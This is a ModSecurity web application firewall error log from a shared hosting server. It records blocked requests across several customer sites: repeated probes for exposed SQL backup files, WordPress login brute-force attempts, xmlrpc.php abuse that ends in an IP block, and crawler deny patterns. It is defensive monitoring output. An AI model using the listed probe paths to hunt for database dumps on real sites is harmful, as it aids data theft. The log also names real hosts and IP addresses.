[Tue May 26 18:19:24.676194 2026] [security2:error] [pid 983082:tid 983204] [remote 153.127.19.115:56718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.19.127.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWW1LvhpIlZJOtze4tAEAAA-3k"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:19:24.809458 2026] [security2:error] [pid 983082:tid 983279] [client 32.192.74.76:60270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/www.sql"] [unique_id "ahWW1LvhpIlZJOtze4tAFQAAAMg"]
[Tue May 26 18:19:27.629321 2026] [security2:error] [pid 983082:tid 983334] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW1rvhpIlZJOtze4tANwAAAP8"]
[Tue May 26 18:19:27.733718 2026] [security2:error] [pid 983082:tid 983325] [client 172.98.32.27:26161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWW17vhpIlZJOtze4tASAAAAPY"]
[Tue May 26 18:19:29.670662 2026] [security2:error] [pid 983082:tid 983267] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW2LvhpIlZJOtze4tAWgAAALw"]
[Tue May 26 18:19:30.316859 2026] [security2:error] [pid 983082:tid 983214] [client 32.192.74.76:60567] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ahWW2rvhpIlZJOtze4tAewAAAIc"]
[Tue May 26 18:19:32.401453 2026] [security2:error] [pid 983082:tid 983252] [client 32.192.74.76:60688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/uploads/backup.sql"] [unique_id "ahWW3LvhpIlZJOtze4tAowAAAK0"]
[Tue May 26 18:19:32.848797 2026] [security2:error] [pid 983082:tid 983237] [client 69.58.76.197:60231] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWW27vhpIlZJOtze4tAmAAAAJ4"], referer: https://anujtradingco.com/
[Tue May 26 18:19:32.875055 2026] [security2:error] [pid 983082:tid 983242] [client 172.225.181.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWW3LvhpIlZJOtze4tAqwAAAKM"]
[Tue May 26 18:19:33.661313 2026] [security2:error] [pid 983082:tid 983232] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW3LvhpIlZJOtze4tArAAAAJk"]
[Tue May 26 18:19:33.776367 2026] [security2:error] [pid 983082:tid 983239] [client 32.192.74.76:60763] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/uploads/database.sql"] [unique_id "ahWW3bvhpIlZJOtze4tAwwAAAKA"]
[Tue May 26 18:19:35.041600 2026] [security2:error] [pid 983082:tid 983322] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW3bvhpIlZJOtze4tAwgAAAPM"]
[Tue May 26 18:19:35.596147 2026] [security2:error] [pid 983082:tid 983193] [remote 74.7.241.58:39866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWW37vhpIlZJOtze4tA6AABA24"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:19:36.683735 2026] [security2:error] [pid 983082:tid 983261] [client 114.119.138.230:22953] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.onesoft.in"] [uri "/product.html"] [unique_id "ahWW4LvhpIlZJOtze4tBBAAAALY"], referer: https://www.onesoft.in/index.html
[Tue May 26 18:19:36.726139 2026] [security2:error] [pid 983082:tid 983286] [client 32.192.74.76:60928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/uploads/traderscafe.sql"] [unique_id "ahWW4LvhpIlZJOtze4tBBQAAAM8"]
[Tue May 26 18:19:37.715456 2026] [security2:error] [pid 983082:tid 983224] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW4LvhpIlZJOtze4tA_wAAAJE"]
[Tue May 26 18:19:38.736366 2026] [security2:error] [pid 983082:tid 983221] [client 32.192.74.76:61048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/uploads/mysql.sql"] [unique_id "ahWW4rvhpIlZJOtze4tBNgAAAI4"]
[Tue May 26 18:19:39.568024 2026] [security2:error] [pid 983082:tid 983325] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW4rvhpIlZJOtze4tBLAAAAPY"]
[Tue May 26 18:19:40.103261 2026] [security2:error] [pid 983082:tid 983292] [client 32.192.74.76:61128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/database.sql"] [unique_id "ahWW5LvhpIlZJOtze4tBTQAAANU"]
[Tue May 26 18:19:41.129437 2026] [security2:error] [pid 983082:tid 983334] [client 32.192.74.76:61180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/backups/database.sql"] [unique_id "ahWW5bvhpIlZJOtze4tBbQAAAP8"]
[Tue May 26 18:19:42.732786 2026] [security2:error] [pid 983082:tid 983281] [client 32.192.74.76:61269] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/blog/backup.sql"] [unique_id "ahWW5rvhpIlZJOtze4tBiwAAAMo"]
[Tue May 26 18:19:42.762136 2026] [security2:error] [pid 983082:tid 983279] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW5bvhpIlZJOtze4tBcwAAAMg"]
[Tue May 26 18:19:44.500621 2026] [security2:error] [pid 983082:tid 983213] [client 32.192.74.76:61366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/blog/mysql.sql"] [unique_id "ahWW6LvhpIlZJOtze4tBsAAAAIY"]
[Tue May 26 18:19:45.351093 2026] [security2:error] [pid 983082:tid 983266] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW6LvhpIlZJOtze4tBowAAALs"]
[Tue May 26 18:19:46.970384 2026] [security2:error] [pid 983082:tid 983252] [client 209.141.44.244:51052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.44.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWW6rvhpIlZJOtze4tB1AAAAK0"]
[Tue May 26 18:19:47.044823 2026] [security2:error] [pid 983082:tid 983308] [client 32.192.74.76:61501] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/blog/traderscafe.sql"] [unique_id "ahWW67vhpIlZJOtze4tB4QAAAOU"]
[Tue May 26 18:19:48.232287 2026] [security2:error] [pid 983082:tid 983254] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW6rvhpIlZJOtze4tB3QAAAK8"]
[Tue May 26 18:19:48.689546 2026] [security2:error] [pid 983082:tid 983223] [client 202.76.169.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW67vhpIlZJOtze4tB5wAAAJA"]
[Tue May 26 18:19:50.124396 2026] [security2:error] [pid 983082:tid 983158] [remote 162.240.229.143:57694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.229.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW7bvhpIlZJOtze4tCIQAA2ks"]
[Tue May 26 18:19:50.585331 2026] [security2:error] [pid 983082:tid 983232] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW7LvhpIlZJOtze4tCBQAAAJk"]
[Tue May 26 18:19:51.731300 2026] [security2:error] [pid 983082:tid 983150] [remote 162.240.229.143:57694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.229.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW77vhpIlZJOtze4tCPgAArEM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:19:51.785981 2026] [security2:error] [pid 983082:tid 983236] [client 32.192.74.76:61747] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahWW77vhpIlZJOtze4tCPwAAAJ0"]
[Tue May 26 18:19:52.643754 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW77vhpIlZJOtze4tCMwAAAJs"]
[Tue May 26 18:19:54.467217 2026] [security2:error] [pid 983082:tid 983296] [client 35.194.18.2:54446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kingsclubmembership.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWW8rvhpIlZJOtze4tCdwAAANk"]
[Tue May 26 18:19:54.768159 2026] [security2:error] [pid 983082:tid 983279] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW8bvhpIlZJOtze4tCXgAAAMg"]
[Tue May 26 18:19:54.973465 2026] [security2:error] [pid 983082:tid 983258] [client 32.192.74.76:61945] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/blog/db.sql"] [unique_id "ahWW8rvhpIlZJOtze4tCfwAAALM"]
[Tue May 26 18:19:56.156065 2026] [security2:error] [pid 983082:tid 983288] [client 32.192.74.76:61989] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/database/backup.sql"] [unique_id "ahWW9LvhpIlZJOtze4tCngAAANE"]
[Tue May 26 18:19:56.316874 2026] [security2:error] [pid 983082:tid 983312] [client 35.194.18.2:51869] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW87vhpIlZJOtze4tCmQAAAOk"]
[Tue May 26 18:19:56.694775 2026] [security2:error] [pid 983082:tid 983274] [client 35.194.18.2:55231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9LvhpIlZJOtze4tCowAAAMM"]
[Tue May 26 18:19:57.135227 2026] [security2:error] [pid 983082:tid 983275] [client 35.194.18.2:51657] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9bvhpIlZJOtze4tCrwAAAMQ"]
[Tue May 26 18:19:57.279191 2026] [security2:error] [pid 983082:tid 983269] [client 85.208.96.194:18612] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/list/"] [unique_id "ahWW9bvhpIlZJOtze4tCtAAAAL4"]
[Tue May 26 18:19:57.279316 2026] [security2:error] [pid 983082:tid 983269] [client 85.208.96.194:18612] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-15-19/list/"] [unique_id "ahWW9bvhpIlZJOtze4tCtAAAAL4"]
[Tue May 26 18:19:57.514516 2026] [security2:error] [pid 983082:tid 983267] [client 35.194.18.2:51329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9bvhpIlZJOtze4tCuwAAALw"]
[Tue May 26 18:19:57.882723 2026] [security2:error] [pid 983082:tid 983317] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW9LvhpIlZJOtze4tCpQAAAO4"]
[Tue May 26 18:19:57.889925 2026] [security2:error] [pid 983082:tid 983222] [client 35.194.18.2:49747] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9bvhpIlZJOtze4tCwQAAAI8"]
[Tue May 26 18:19:58.259362 2026] [security2:error] [pid 983082:tid 983272] [client 35.194.18.2:56062] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9rvhpIlZJOtze4tCywAAAME"]
[Tue May 26 18:19:58.640985 2026] [security2:error] [pid 983082:tid 983293] [client 35.194.18.2:51871] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9rvhpIlZJOtze4tCzwAAANY"]
[Tue May 26 18:19:59.036672 2026] [security2:error] [pid 983082:tid 983290] [client 35.194.18.2:51874] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW9rvhpIlZJOtze4tC1wAAANM"]
[Tue May 26 18:19:59.422169 2026] [security2:error] [pid 983082:tid 983244] [client 35.194.18.2:61157] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW97vhpIlZJOtze4tC5AAAAKU"]
[Tue May 26 18:19:59.747394 2026] [security2:error] [pid 983082:tid 983317] [client 35.194.18.2:56266] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW97vhpIlZJOtze4tC7gAAAO4"]
[Tue May 26 18:20:00.107082 2026] [security2:error] [pid 983082:tid 983295] [client 35.194.18.2:63312] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW-LvhpIlZJOtze4tC9QAAANg"]
[Tue May 26 18:20:00.107141 2026] [security2:error] [pid 983082:tid 983295] [client 35.194.18.2:63312] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW-LvhpIlZJOtze4tC9QAAANg"]
[Tue May 26 18:20:00.465678 2026] [security2:error] [pid 983082:tid 983247] [client 35.194.18.2:53591] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW-LvhpIlZJOtze4tC-QAAAKg"]
[Tue May 26 18:20:00.465860 2026] [security2:error] [pid 983082:tid 983247] [client 35.194.18.2:53591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWW-LvhpIlZJOtze4tC-QAAAKg"]
[Tue May 26 18:20:00.507889 2026] [security2:error] [pid 983082:tid 983294] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW97vhpIlZJOtze4tC4wAAANc"]
[Tue May 26 18:20:00.831174 2026] [security2:error] [pid 983082:tid 983309] [client 114.119.153.208:62827] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.lifestylemne.me"] [uri "/"] [unique_id "ahWW-LvhpIlZJOtze4tC-gAAAOY"], referer: http://www.lifestylemne.me/
[Tue May 26 18:20:01.670984 2026] [security2:error] [pid 983082:tid 983242] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW-bvhpIlZJOtze4tC_QAAAKM"]
[Tue May 26 18:20:04.105862 2026] [security2:error] [pid 983082:tid 983179] [remote 46.101.54.125:46948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW-7vhpIlZJOtze4tDPgAAj2A"]
[Tue May 26 18:20:04.661762 2026] [security2:error] [pid 983082:tid 983166] [remote 46.101.54.125:46948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW_LvhpIlZJOtze4tDTAAA71M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:20:04.859336 2026] [security2:error] [pid 983082:tid 983173] [remote 52.167.144.193:58413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "paramjyotifoundation.in"] [uri "/about-us.php"] [unique_id "ahWW_LvhpIlZJOtze4tDUAAA91o"]
